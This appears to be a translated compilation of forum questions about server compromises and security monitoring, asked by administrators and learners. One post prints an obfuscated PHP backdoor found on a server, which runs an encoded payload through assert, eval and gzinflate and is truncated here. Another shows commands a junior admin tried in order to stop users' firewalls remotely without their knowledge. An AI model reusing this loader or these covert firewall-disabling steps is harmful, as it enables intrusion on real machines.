标签: hacking

有时在我的每日日志观察报告中，我注意到 httpd 下有一个部分是“尝试使用已知的黑客攻击......”，另一部分是关于有多少站点探测了服务器。我对这些部分有几个问题：

1. 是 apache 还是 logwatch 接收和报告已知的黑客攻击？哪个程序实际上知道它是一个已知的黑客？这些程序之一是否使用某个位置或参考点来列出已知攻击？
2. logwatch 是否能够报告攻击是否成功，或者我是否需要一个单独的软件来获取它？
3. 当 logwatch 报告 x 数量的站点探测服务器时，这到底是什么意思？是端口扫描吗？漏洞扫描？指纹？是 apache 向日志文件报告这一点，还是 logwatch 正在分析日志文件并弄清楚？

我有一台作为测试服务器运行的 linux 机器。我的盒子直接在这台机器上重定向我的端口，比如 80。我创建它来训练所有类型的东西（raid、tcp ......）。

最近我尝试在 VNC 中连接到我的机器，但出现错误“身份验证失败太多”，因此我检查了日志，得到了一个可怕的惊喜；有人试图在 VNC 中通过蛮力连接到我的机器。以下是此日志的简短摘录：

04/01/17 13:53:56 Got connection from client 111.73.46.90
04/01/17 13:53:56 Using protocol version 3.3
04/01/17 13:53:56 Too many authentication failures - client rejected
04/01/17 13:53:56 Client 111.73.46.90 gone
04/01/17 13:53:56 Statistics:
04/01/17 13:53:56   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 13:53:57 Got connection from client 111.73.46.90
04/01/17 13:53:57 Using protocol version 3.3
04/01/17 13:53:57 Too many authentication failures - client rejected
04/01/17 13:53:57 Client 111.73.46.90 gone
04/01/17 13:53:57 Statistics:
04/01/17 …

我是一家公司的 Jr Admin，他的老板似乎认为将本地管理员权限授予所有用户是个好主意……除非我接受他的工作，否则我无法获胜。我们有一些用户将防火墙设置为禁用所有进入的连接。

如何在他们不知情的情况下远程重新配置这些防火墙？

以下尝试失败！

S:>net use \192.168.1.71\IPC$ "password" /user:domain\username 命令成功完成。

S:\pstools>sc \192.168.1.71 暂停“Windows 防火墙/Internet 连接共享 (ICS)”[SC] OpenSCManager FAILED 1722：

RPC 服务器不可用。

S:\pstools>telnet \192.168.1.71 135 正在连接到 \192.168.1.71...无法打开与主机的连接，在端口 13 5：连接失败

S:\pstools>psservice \192.168.1.71 -u domain\username -p 密码停止“Windows 防火墙/Internet 连接共享（ICS）”

PsService v2.21 - 服务信息和配置实用程序 版权所有 (C) 2001-2006 Mark Russinovich Sysinternals - www.sysinternals.com

无法访问 \192.168.1.71 上的服务控制管理器：RPC 服务器不可用。

当然我可以开车出去抢机器，做一些事情让我被解雇以正确完成事情，但我正在寻找一种更简单的方法来完成这项工作。

我有一个建立在旧 Pigg 版本上的网站（从 2006 年开始）。该站点托管在 Dreamhost 共享服务器上。今天早上我发现我网站的主数据库被完全删除了。

我如何确认是黑客还是其他原因造成的？我能做些什么来防止它再次发生？我无法切换到新版本的 pligg，因为我对原始版本进行了许多自定义。

任何建议都非常感谢。

监控和禁止网站篡改的最佳实践、政策、工具/实用程序是什么？

如果我发现有人试图入侵我的服务器，是否有适当的回应？或者是看看他们正在尝试什么并确保我们能够抵御它和类似的攻击？

干杯，

罗宾

在我们的目录之一中找到了一个我们没有创建的奇怪文件。

它被命名为“.moreinfoege.php.KJt” 在目录中我们还有一个名为moreinfo.php的文件

我们最近遇到了服务器问题（WordPress 黑客、DDoS 攻击），因此我们对其他渗透保持高度警惕。这是一个黑客吗？它可以通过哪些方式进入？

这是它的内容的样子（长的乱码字符串缩写为适合这里）：

<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 [...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>

可能重复：
我的服务器被黑了 紧急情况

我一直在用 .net framework 3.5 设计一个 asp.net 站点，一切都很好，直到我的站点突然被黑，它说一个中文组和一些其他文字图片 jpg 他们将文件放入 ft​​p 服务器我删除它们然后他们再次放入我更改了所有密码，他们又做了一次我认为他们是一些脚本程序员，我无法通过删除方法做任何事情，请帮助我。

在我的 Windows Server 2003 虚拟服务器上创建了空白目录，其子目录很奇怪（例如：“88ÿ ÿ ÿÿþþ þþ13þ”）。看起来他们正在上传盗版 DVD 和盗版软件。我所有的带宽和文件空间都被吃光了。

这可能是共享权限问题吗？我应该去哪里进一步调查？

我对被击中的目录的安全权限如下：管理员 - ALL GRANTED IIS_WPG - 读取和执行，列出文件夹内容，读取 Internet 访客 - 拒绝系统 - 所有授予的用户 - 读取和执行，列出文件夹内容，读取

我的事件查看器显示许多没有 IP 的登录/注销？

我对进入安全领域很感兴趣，然后我研究了有关该领域的各种帖子。有人告诉我，我必须首先从安全角度彻底了解 unix 系统，然后才能走得更远。

我只知道基本的 Linux，我的公司有本地服务器 Ubuntu 和 VPS 服务器 centos 5。我通过托管站点和其他小的东西（如备份、cron 等）来管理它。

但我对日志等一无所知。有人写了以下内容：

观看实时 tcpdump 会话、系统日志条目、Web 服务器日志、snort 转储、转储实时系统内存，以及一百万种其他开源工具，用于窥视和查看正在运行的系统的内部结构。

还：

运行一个实时 SMTP 服务器，观察垃圾邮件机器人并扫描恶意软件。设置一个 Web 服务器并观看脚本小子在您的 Web 和数据库日志中尝试 SQL 注入攻击。查看您的 ssh 日志以进行暴力攻击。设置一个通用的博客引擎，并享受对抗垃圾邮件机器人和攻击的乐趣。了解如何部署各种虚拟化技术以将服务彼此分区。直接了解 ACL、MAC 和系统级审计是否值得为标准系统权限进行额外的工作和麻烦。

现在我真的很想 dl 所有这些东西。任何人都可以指导我阅读任何书籍。视频讲座，考试可以帮助我做这些事情。

每当我学习 Linux 的任何新东西时，我都会将其应用到我的实时服务器上。这就是我学习所有Linux的方式。

有任何想法吗